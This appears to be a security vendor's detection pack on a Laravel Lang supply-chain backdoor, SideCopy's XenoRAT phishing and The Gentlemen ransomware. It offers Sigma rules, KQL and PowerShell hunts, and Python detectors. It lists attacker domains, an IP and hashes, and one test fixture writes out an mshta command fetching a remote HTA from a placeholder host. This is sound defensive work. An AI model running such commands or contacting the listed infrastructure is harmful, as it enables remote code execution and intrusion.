
Laravel Supply Chain RCE, SideCopy XenoRAT Campaigns, and The Gentlemen RaaS Activity — Enterprise Detection Pack

Security Arsenal Team
May 31, 2026
6 min read

Recent OTX pulses indicate a convergence of high-risk threats spanning supply chain compromises, geo-political espionage, and financially motivated Ransomware-as-a-Service (RaaS).

  1. Supply Chain (Laravel Lang): A coordinated attack on community-maintained Laravel packages (laravel-lang/lang, laravel-lang/attributes, etc.) has introduced RCE backdoors. The adversaries compromised maintainer credentials to publish malicious tags affecting 700+ versions, deploying the helpers.php stealer and DebugChromium.exe.

  2. Espionage (Operation XENOFISCAL): The SideCopy APT (linked to Transparent Tribe/APT36) is actively targeting the Afghanistan Ministry of Finance using Pashto-language spear phishing lures. The attack chain leverages LNK files executing mshta.exe to fetch remote HTA payloads, ultimately deploying the persistent XenoRAT.

  3. Cybercrime (The Gentlemen): Storm-2697's "The Gentlemen" RaaS is gaining traction. Written in Go, it utilizes robust encryption (Curve25519 + XChaCha20) and aggressive self-propagation capabilities to target Education, Transportation, Healthcare, and Finance sectors.

Threat Actor / Malware Profile

Laravel Supply Chain Actors

  • Malware: helpers.php stealer, DebugChromium.exe.
  • Distribution: Compromised npm/composer packages (laravel-lang/*).
  • Behavior: The malicious PHP files act as stealers and downloaders, fetching DebugChromium.exe which likely establishes persistence and exfiltrates data to flipboxstudio.info.

SideCopy (APT36 / Transparent Tribe)

  • Malware: XenoRAT.
  • Targeting: Afghan Government (MoF), Finance, Provincial Revenue Directorates.
  • Distribution: Spear phishing with malicious LNK files disguised as staff directories.
  • Behavior: Multi-stage loader. LNK triggers mshta.exe -> retrieves HTA from compromised domains (abimj.edu.af) -> drops XenoRAT. XenoRAT provides remote control, C2 communication, and data theft.

Storm-2697 (The Gentlemen)

  • Malware: The Gentlemen Ransomware, Kazuar.
  • Targeting: Broad (Education, Transport, Health, Finance).
  • Behavior: Self-propagating Go binary. Uses advanced cryptography for file encryption. Network propagation suggests SMB or worm-like capabilities to spread across the enterprise.
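The mass file modification and network propagation described above is easiest to catch at the file-event layer rather than from process attributes alone. The following is an added example, not code from the original pack or from any vendor: a sliding-window counter in Python that flags any process touching many distinct files within a few seconds, the file-level signature of an encryptor (ATT&CK T1486). The event schema (timestamp, pid, image, action, path), the window and threshold values, and the sample events are all constructed assumptions.

```python
"""Flag processes that modify or rename many distinct files in a short window.

Added example (not from the original detection pack): a sliding-window counter
over file-modification events. The sample events are constructed; the field
names are an assumed normalised schema, not a specific EDR's.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(seconds=10)   # assumption: tune against your own baseline
THRESHOLD = 20                   # distinct files touched within WINDOW by one process
WATCHED_ACTIONS = {"FileRenamed", "FileModified"}


def detect_mass_modification(events, window=WINDOW, threshold=THRESHOLD):
    """Return {pid: (image, time the threshold was first exceeded)}."""
    recent = defaultdict(deque)  # pid -> deque of (timestamp, path) inside the window
    alerts = {}
    for ev in sorted(events, key=lambda e: e["timestamp"]):
        if ev["action"] not in WATCHED_ACTIONS:
            continue
        pid = ev["pid"]
        q = recent[pid]
        q.append((ev["timestamp"], ev["path"]))
        # Drop entries that have fallen out of the sliding window
        while q and ev["timestamp"] - q[0][0] > window:
            q.popleft()
        distinct = {path for _, path in q}
        if len(distinct) >= threshold and pid not in alerts:
            alerts[pid] = (ev["image"], ev["timestamp"])
    return alerts


def _sample_events():
    """Constructed telemetry: one burst from a hypothetical encryptor renaming
    files on a share, and one slow interactive editor. Names are illustrative."""
    t0 = datetime(2026, 5, 31, 12, 0, 0)
    burst = [{"timestamp": t0 + timedelta(milliseconds=50 * i), "pid": 4242,
              "image": r"C:\Users\Public\encryptor-sample.exe", "action": "FileRenamed",
              "path": rf"\\FILESRV\share\doc{i}.docx"} for i in range(40)]
    slow = [{"timestamp": t0 + timedelta(seconds=15 * i), "pid": 1001,
             "image": r"C:\Program Files\Editor\editor.exe", "action": "FileModified",
             "path": rf"C:\Users\dev\notes{i}.txt"} for i in range(40)]
    return burst + slow


SAMPLE_EVENTS = _sample_events()

if __name__ == "__main__":
    for pid, (image, when) in detect_mass_modification(SAMPLE_EVENTS).items():
        print(f"[ALERT T1486] pid={pid} image={image} threshold exceeded at {when.isoformat()}")
```

Only the burst process trips the threshold; the editor, writing one file every fifteen seconds, never has more than one distinct path inside the window. In production the same counter can be keyed by (pid, share path) to surface the SMB propagation case separately from local encryption.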

IOC Analysis

Indicator Types:

  • Network Infrastructure: C2 domains (flipboxstudio.info), compromised legit infrastructure (abimj.edu.af), and C2 IPs (103.132.98.224).
  • File Artifacts: SHA256, MD5, and SHA1 hashes for the stealer components, XenoRAT payloads, and The Gentlemen encryptor.

Operational Guidance:

  • SOC/EDR: Import all hashes into EDR solutions for immediate alerting on execution attempts. Block the listed domains and IPs at the perimeter and proxy level.
  • Threat Hunting: Use the specific hashes to hunt for historical presence. Focus on the flipboxstudio.info domain connections in outbound logs to identify potential Laravel-compromise victims. Investigate any mshta.exe processes spawned by LNK files or Office products for SideCopy activity.

Detection Engineering

```yaml
---
title: Potential Laravel Lang Backdoor Execution
description: Detects execution of suspicious binaries (DebugChromium.exe) spawned by PHP processes, indicative of the Laravel Lang compromise.
author: Security Arsenal
date: 2026/05/31
references:
  - https://socket.dev/blog/laravel-lang-compromise
tags:
  - attack.execution
  - attack.t1204
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\php.exe'
      - '\php-cgi.exe'
    Image|endswith:
      - '\DebugChromium.exe'
      - '\powershell.exe'
      - '\cmd.exe'
  condition: selection
falsepositives:
  - Legitimate developer testing
level: high

---
title: SideCopy APT HTA Payload via Mshta
description: Detects SideCopy activity where mshta.exe executes remote HTA content, often initiated by malicious LNK files.
author: Security Arsenal
date: 2026/05/31
references:
  - https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
tags:
  - attack.initial-access
  - attack.t1566.001
  - attack.t1204.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\mshta.exe'
    # Both substrings are required; repeating the CommandLine|contains key would be invalid YAML
    CommandLine|contains|all:
      - 'http'
      - '.hta'
  filter:
    # explorer.exe is deliberately not filtered: a double-clicked LNK is parented by
    # explorer.exe, which is the delivery path described for this campaign.
    ParentImage|endswith:
      - '\iexplore.exe'
      - '\chrome.exe'
  condition: selection and not filter
falsepositives:
  - Legitimate administrative scripts
level: critical

---
title: The Gentlemen Ransomware Suspicious Go Process
author: Security Arsenal
date: 2026/05/31
description: Detects potential Go-based ransomware (The Gentlemen) exhibiting mass file modification or suspicious SMB propagation patterns.
references:
  - https://www.microsoft.com/en-us/security/blog/2026/05/28/the-gentlemen-ransomware-dissecting-a-self-propagating-go-encryptor/
tags:
  - attack.impact
  - attack.t1486
logsource:
  category: process_creation
  product: windows
detection:
  selection_go:
    Image|endswith: '.exe'
    Company|contains: 'Go' # Weak signal: many Go binaries carry no version resource at all; corroborate with other telemetry
  selection_behavior:
    CommandLine|contains:
      - 'encryption'
      - 'C$'
      - 'ADMIN$'
  condition: all of selection_*
falsepositives:
  - Legitimate Go admin tools
level: medium
```

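To check what the two process-creation rules above actually match, here is an added example (not part of the original pack) that re-implements their logic in Python and runs it over constructed sample events. The event fields mirror Sigma's process_creation schema (Image, ParentImage, CommandLine); the paths and the example.invalid host in the command lines are placeholders. It also covers the edge case that matters for the SideCopy rule: an mshta.exe launched by a double-clicked LNK has explorer.exe as its parent and must still fire, while a browser parent is filtered as in the rule.

```python
"""Evaluate the Laravel Lang and SideCopy mshta process-creation rules.

Added example, not code from the original pack. Events are constructed and
follow the Sigma process_creation field names.
"""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str
    parent_image: str
    command_line: str


def _endswith_any(value: str, suffixes) -> bool:
    """Case-insensitive equivalent of Sigma's |endswith on a list of values."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def laravel_backdoor_rule(ev: ProcessEvent) -> bool:
    """Rule 1: a PHP process spawning DebugChromium.exe or a shell."""
    php_parents = ("\\php.exe", "\\php-cgi.exe")
    children = ("\\DebugChromium.exe", "\\powershell.exe", "\\cmd.exe")
    return _endswith_any(ev.parent_image, php_parents) and _endswith_any(ev.image, children)


def sidecopy_mshta_rule(ev: ProcessEvent) -> bool:
    """Rule 2: mshta.exe pulling a remote .hta.

    explorer.exe is not filtered: a double-clicked LNK is parented by
    explorer.exe, which is the campaign's delivery path. Browser parents are
    filtered, matching the rule's false-positive filter."""
    if not _endswith_any(ev.image, ("\\mshta.exe",)):
        return False
    cl = ev.command_line.lower()
    if "http" not in cl or ".hta" not in cl:
        return False
    browser_parents = ("\\iexplore.exe", "\\chrome.exe")
    return not _endswith_any(ev.parent_image, browser_parents)


RULES = {
    "Potential Laravel Lang Backdoor Execution": laravel_backdoor_rule,
    "SideCopy APT HTA Payload via Mshta": sidecopy_mshta_rule,
}


def evaluate(events):
    """Return (rule title, event) pairs for every rule that matches each event."""
    return [(title, ev) for ev in events for title, rule in RULES.items() if rule(ev)]


# Constructed sample telemetry (not real logs); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    # LNK double-click: explorer.exe parent, remote HTA -> must fire
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta.exe http://example.invalid/staff_directory.hta"),
    # Browser parent -> filtered by the rule
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "mshta.exe http://example.invalid/page.hta"),
    # Local HTA, no remote fetch -> not matched
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 r"mshta.exe C:\Users\dev\local.hta"),
    # PHP spawning the dropped binary -> rule 1 fires
    ProcessEvent(r"C:\Users\dev\AppData\Local\Temp\DebugChromium.exe", r"C:\php\php.exe",
                 "DebugChromium.exe"),
    # Ordinary shell from explorer -> nothing
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for title, ev in evaluate(SAMPLE_EVENTS):
        print(f"[{title}] parent={ev.parent_image} image={ev.image} cmd={ev.command_line}")
```

Running it yields exactly two hits: the explorer-parented remote HTA and the PHP-spawned DebugChromium.exe. If your own rule copy filters explorer.exe, the first event goes silent, which is the gap to close.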

```kql
// Hunt for SideCopy C2 Domains and IPs
// RemoteUrl may hold a full URL rather than a bare host, so match with has instead of an exact in() list
DeviceNetworkEvents
| where RemoteUrl has "abimj.edu.af" or RemoteIP == "103.132.98.224"
| project Timestamp, DeviceName, InitiatingProcessAccountName, RemoteUrl, RemoteIP, RemotePort

// Hunt for Laravel Backdoor C2 Domain
DeviceNetworkEvents
| where RemoteUrl has "flipboxstudio.info"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl

// Hunt for specific XenoRAT and Gentlemen File Hashes (SHA256 and MD5 indicators from the pulses)
DeviceProcessEvents
| where SHA256 in (
    "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01",
    "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d",
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"
) or MD5 in (
    "0b937b7da4602a8aa5346681b13a3466",
    "14ce728a416b1f13e8645f3f7b860a37",
    "7a262d4cbbc4808922b6af42c4041f06"
)
| project Timestamp, DeviceName, FileName, SHA256, MD5, AccountName
```


```powershell
# IOC Hunt Script for Laravel Backdoor and SideCopy Activity
# Requires Administrative Privileges

Write-Host "Starting IOC Hunt based on OTX Pulses..." -ForegroundColor Cyan

# Hashes are grouped by algorithm: Get-FileHash defaults to SHA256, so the MD5
# indicators must be compared against MD5 digests or they can never match.
$IOC_Hashes = @{
    SHA256 = @(
        "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01", # XenoRAT
        "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d", # XenoRAT
        "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67", # The Gentlemen
        "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68"  # The Gentlemen
    )
    MD5 = @(
        "0b937b7da4602a8aa5346681b13a3466", # XenoRAT
        "14ce728a416b1f13e8645f3f7b860a37", # XenoRAT
        "7a262d4cbbc4808922b6af42c4041f06"  # The Gentlemen
    )
}

$IOC_Domains = @("flipboxstudio.info", "abimj.edu.af")

# 1. Check for Malicious File Hashes (C:\ drive scan)
# Enumerate the drive once and hash each file once per algorithm instead of
# re-hashing the whole drive for every indicator. $matches is a PowerShell
# automatic variable, so the results use a different name.
Write-Host "Scanning for known malicious file hashes..." -ForegroundColor Yellow
$files = Get-ChildItem -Path C:\ -File -Recurse -ErrorAction SilentlyContinue
foreach ($algo in $IOC_Hashes.Keys) {
    $wanted = $IOC_Hashes[$algo]
    $hashHits = $files |
        Get-FileHash -Algorithm $algo -ErrorAction SilentlyContinue |
        Where-Object { $wanted -contains $_.Hash }
    foreach ($hit in $hashHits) {
        Write-Host "[ALERT] Malicious file found ($algo): " -NoNewline -ForegroundColor Red
        Write-Host $hit.Path
    }
}

# 2. Check DNS Cache for Malicious Domains
Write-Host "Checking DNS Cache for C2 Domains..." -ForegroundColor Yellow
$dnsEntries = Get-DnsClientCache -ErrorAction SilentlyContinue
foreach ($domain in $IOC_Domains) {
    $hit = $dnsEntries | Where-Object { $_.Entry -like "*$domain*" }
    if ($hit) {
        Write-Host "[ALERT] C2 Domain found in DNS Cache: " -NoNewline -ForegroundColor Red
        Write-Host $domain
    }
}

# 3. Check for suspicious mshta.exe connections (Process Check)
Write-Host "Checking for mshta.exe processes with network activity..." -ForegroundColor Yellow
$processes = Get-CimInstance Win32_Process -Filter "Name = 'mshta.exe'"
if ($processes) {
    Write-Host "[WARN] mshta.exe is currently running. Investigate parent process." -ForegroundColor DarkYellow
    foreach ($proc in $processes) {
        $parent = Get-CimInstance Win32_Process -Filter "ProcessId = $($proc.ParentProcessId)"
        # Established TCP connections owned by this mshta.exe instance (remote HTA retrieval)
        $conns = Get-NetTCPConnection -OwningProcess $proc.ProcessId -State Established -ErrorAction SilentlyContinue
        Write-Host "PID: $($proc.ProcessId), Parent PID: $($proc.ParentProcessId) ($($parent.Name)), CommandLine: $($proc.CommandLine)"
        foreach ($c in $conns) {
            Write-Host "    -> $($c.RemoteAddress):$($c.RemotePort)"
        }
    }
}

Write-Host "Hunt Complete." -ForegroundColor Green
```

Response Priorities

  • Immediate:

    • Block all listed IOCs (flipboxstudio.info, 103.132.98.224, abimj.edu.af) at perimeter firewalls, proxies, and endpoint security gateways.
    • Isolate any endpoints triggering alerts for the specific file hashes (XenoRAT, The Gentlemen, DebugChromium.exe).
    • Initiate a hunt for mshta.exe spawned by non-standard parent processes (SideCopy).
  • 24 Hours:

    • Laravel Incident: Verify the integrity of laravel-lang dependencies in development environments. Force a re-download of packages from known-good sources, or pin them to specific pre-compromise versions.
    • Credential Audit: If credential-stealing malware (helpers.php) is suspected, force reset of developer credentials and tokens potentially exposed.
  • 1 Week:

    • Architecture Hardening: Implement strict package verification and SBOM scanning for CI/CD pipelines to prevent supply chain injection.
    • Lateral Movement Restrictions: Review SMB/RPC permissions to hinder the self-propagation capabilities of threats like The Gentlemen.
    • Phishing Awareness: Update security awareness training to include specific lures related to Pashto-language documents or financial-themed attachments targeting relevant departments.
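As an added example for the Laravel incident steps above (not code from the original pack or from the laravel-lang project), the script below audits a composer.lock against an operator-supplied allow-list of pre-compromise versions and lists any helpers.php under vendor/laravel-lang for manual review. The KNOWN_GOOD pins and the sample lock contents are placeholders; the real pre-compromise versions must come from your own verified history.

```python
"""Audit composer.lock for laravel-lang packages and surface helpers.php files.

Added example, not code from the original pack or the laravel-lang project.
KNOWN_GOOD holds PLACEHOLDER versions: replace them with the last versions you
verified before the compromise window. The sample lock file is constructed.
"""
import json
from pathlib import Path

# Placeholder pins (assumption): the operator fills these from verified history.
KNOWN_GOOD = {
    "laravel-lang/lang": {"0.0.0-placeholder"},
    "laravel-lang/attributes": {"0.0.0-placeholder"},
}


def audit_lock(lock_text: str, known_good=KNOWN_GOOD):
    """Return {package: (installed version, verdict)} for every laravel-lang/* entry.

    Both the production and dev sections are checked, because the malicious
    tags could be pulled in by either."""
    lock = json.loads(lock_text)
    results = {}
    for section in ("packages", "packages-dev"):
        for pkg in lock.get(section, []):
            name = pkg.get("name", "")
            if not name.startswith("laravel-lang/"):
                continue
            version = pkg.get("version", "?")
            pins = known_good.get(name)
            if pins is None:
                verdict = "review: no pinned pre-compromise version recorded"
            elif version in pins:
                verdict = "ok"
            else:
                verdict = "flag: not a pinned pre-compromise version"
            results[name] = (version, verdict)
    return results


def find_helpers_php(vendor_dir):
    """List helpers.php files under vendor/laravel-lang for manual review.

    The campaign's stealer was named helpers.php, so a hit is a lead to inspect,
    not proof of compromise on its own."""
    root = Path(vendor_dir) / "laravel-lang"
    if not root.is_dir():
        return []
    return sorted(str(p) for p in root.rglob("helpers.php"))


# Constructed sample composer.lock excerpt (versions are illustrative only).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "laravel-lang/lang", "version": "0.0.0-placeholder"},
        {"name": "laravel-lang/attributes", "version": "9.9.9-unverified"},
        {"name": "laravel-lang/locales", "version": "1.0.0-sample"},
        {"name": "laravel/framework", "version": "1.0.0-sample"},
    ],
    "packages-dev": [],
})

if __name__ == "__main__":
    for name, (version, verdict) in audit_lock(SAMPLE_LOCK).items():
        print(f"{name:28} {version:20} {verdict}")
    for path in find_helpers_php("vendor"):
        print(f"review: {path}")
```

Run it from the project root after a clean checkout; anything marked flag or review should be compared against the package's source repository before the next composer install, and the same check belongs in CI so a drifted lock file fails the build.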
